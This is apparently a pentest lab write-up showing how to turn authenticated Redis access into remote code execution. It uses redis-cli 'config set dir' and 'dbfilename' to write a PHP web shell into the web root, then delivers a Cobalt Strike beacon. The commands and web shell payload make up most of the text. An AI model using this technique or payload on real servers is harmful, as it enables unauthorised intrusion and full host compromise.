Redis RCE Post Exploitation

Hi Pentester,

Just had a fun with my testing lab related to Redis server. This morning after woke up a bit early, I started my Kali linux machine and thinking about excercising my pentest technical skill. I found one lab related to Redis server which is quite intersting.

I would like to share on post exploitation based on the access that we have on Redis server. So I assume that you alread had the access as administrator on the Redis server and able to connect via remotely

Post Exploitation

First you need to connect to the server using the redish-cli and specify the IP address

redish-cli -h 10.129.218.54

The next is to do the authentication so that you can have execute redis command on the server

auth [PUT YOUR PASSWORD HERE]

Once the authentication is done then the next is to set redis configuration path. This is where we put our exploit which will help us on the RCE

config set dir C:\xampp\htdocs\

Lets setup the backdoor file php file

config set dbfilename grem.php

Since my redis server is also hosting a web application based on the PHP then we create a webshell called grem.php

The next phase is to set the content of the php backdoor file

set grem "<?php system($_REQUEST['me']); ?>"

Setup the foot hold

As we have successfully created the backdoor so we can start the RCE. Lets test the backdoor with command whoami

Based on the result returned by the webshell, It looks like the backdoor is perfecly working and we can see that the webserver is running as NT AUTHORITY/SYSTEM.

Built Control

I use cobaltstrike to navigate further activities such as hash dumping or lateral movement. With the capability that we have above then we can deliver our beacon.

I use the Scripted web delivery to install my beacon on the compromised host with the above configuration. Cobaltstrike will generate the oneliner that you can execute on the host or via our RCE